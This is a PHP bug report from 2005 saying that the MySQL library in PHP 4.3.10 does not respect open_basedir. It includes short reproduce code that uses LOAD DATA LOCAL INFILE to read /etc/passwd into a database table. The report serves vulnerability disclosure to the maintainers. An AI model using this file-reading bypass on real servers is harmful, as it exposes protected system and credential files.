ID: 31711
Updated by: [EMAIL PROTECTED]
Reported By: tim at zielosko dot net
-Status: Open
+Status: Feedback
Bug Type: MySQL related
Operating System: GNU/Debian
PHP Version: 4.3.10
New Comment:
Are you using the built-in MySQL library.
Previous Comments:
------------------------------------------------------------------------
[2005-01-26 23:57:02] tim at zielosko dot net
Description:
------------
As already mentioned in PHP Bugs Bug #28632 and Bug #23779, mysqllib
still isn't respecting open_basedir. So opening of any files in the
local filesystem is possible.
Normally, this should have been fixed in PHP 4.3.8, but the exploit
still works.
Reproduce code:
---------------
<?php
$ressource = mysql_connect('host', 'user', 'password');
$db_selected = mysql_select_db('db', $ressource);
$result = mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE
passwd");
if (!$result) die('MySQL Error: ' . mysql_error());
mysql_close($ressource);
?>
Expected result:
----------------
Access denied error or command not allowed.
Actual result:
--------------
The file /etc/passwd will be inserted into the table passwd.
------------------------------------------------------------------------
--
Edit this bug report at http://bugs.php.net/?id=31711&edit=1
